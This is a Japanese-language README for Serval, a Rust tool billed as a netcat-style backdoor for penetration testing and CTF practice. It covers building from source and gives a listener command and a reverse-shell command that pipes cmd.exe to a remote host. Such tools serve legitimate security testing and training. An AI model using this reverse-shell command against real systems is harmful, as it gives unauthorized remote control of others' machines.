
ペネトレーションテストおよびペンテスト演習用のNetcatスタイルのバックドア
Servalは、ペンテストやペネトレーションテスト演習のためにリバースシェルやバインドシェルを起動する、軽量で使いやすいバイナリです。Servalはクロスプラットフォームであり、Windows 32ビット/64ビットおよびLinux 32ビット/64ビットの両方に対応しています。注意:Rustの柔軟性により、他のプラットフォーム(ARMなど)向けにコンパイルすることも可能かもしれませんが、他のプラットフォームではテストしていません。
私は、HacktheBoxのチャレンジ中にnetcatへの依存を排除するためにServalを開発しました。Windows用のnetcatバイナリ(特に-eオプション付き)を見つけるのは面倒であり、信頼できるソースからバイナリを見つけるのはさらに困難だからです。
GitHubからソースをダウンロード
git clone https://github.com/tgadola/serval.git && cd serval-master
*オプション:.cargo/configのビルドファイルを編集して、ビルドパスを変更できます。
現在のプラットフォーム用にバイナリをビルドします。
cargo build --release
*注:v1.1.0にはRust nightlyが必要です。
他のプラットフォーム用にビルドするには、以下を使用します。
cargo build --release --target <target-triple>
特に信頼できる方は、こちらからプレビルドバイナリをダウンロードできます。
デフォルトでは、Servalはポートでリッスンするか接続し、標準入出力をその接続にパイプします。-eフラグはプロセスを起動し、その標準入出力をネットワーク経由でパイプします。
Servalはすべてのインターフェースでリッスンします。
-Hフラグを使用して、ライン編集とコマンド履歴機能を有効にします。
serval -l 4400 -H
serval.exe <listening ip> <listening port> -q -e cmd.exe
@kkawakam-transferwise氏とそのRustylineクレートに多大な感謝を。実際にすべての重労働をやってくれています。Rustylineをチェックしてみてください!
Clapの作成者と貢献者に感謝します。Clapをチェックしてみてください。
Anyhowの作成者と貢献者に感謝します。Anyhowをチェックしてみてください。素晴らしいクレート名に+1。
Rustに関するアドバイスをくれた@jaynusに感謝します。
Apache 2.0。詳細はライセンスファイルを参照してください。